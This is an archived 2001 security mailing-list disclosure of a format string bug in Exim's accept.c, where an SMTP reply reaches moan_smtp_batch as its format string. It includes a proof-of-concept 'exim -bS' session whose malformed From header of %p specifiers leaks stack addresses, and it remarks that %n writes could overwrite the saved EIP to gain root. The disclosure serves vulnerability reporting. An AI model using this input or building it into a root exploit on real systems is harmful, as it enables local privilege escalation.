Hi BugTrackers Just a little bug to tell: THE BUG ------- accept.c, line 2506: else if (smtp_reply != NULL) moan_smtp_batch(NULL, smtp_reply); while moan_smtp_batch is like this: moan_smtp_batch(char *cmd_buffer, char *format, ...) So when smtp_reply contains format strings, it get transformed by moan_smtp_batch(). Why I said that it's a little bug? ---------------------------------- This piece of code is only executed when exim is configured to check incoming mails' headers: /etc/exim.conf should have an option set: headers_check_syntax By default it's turned OFF. only few ppl turn it on. So it's NOT vulnerable BY DEFAULT. Exploitation: ------------- Try this: ===8<======8<=======8<====== lez:~$ /usr/sbin/exim -bS mail from:lez@lez rcpt to:hax0r@lez data From:@@%p%p%p%p%p%p%p%p%p%p . ===8<======8<=======8<======= Somewhere in the answers you should see: 550 Syntax error in 'From' header: domain missing or malformed: failing address is: @@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40 If you change %p's to %s's, you get segfault. With carefully constructed thing, it's easy to overwrite saved eip with %n's, and get root out of this bug. No exploit yet, but after the many local format bug exploits it's not a big work to write one for a skilled man. -- Megyer Laszlo (Lez) lezat_private
This archive was generated by hypermail 2b30 : Wed Jun 06 2001 - 09:51:56 PDT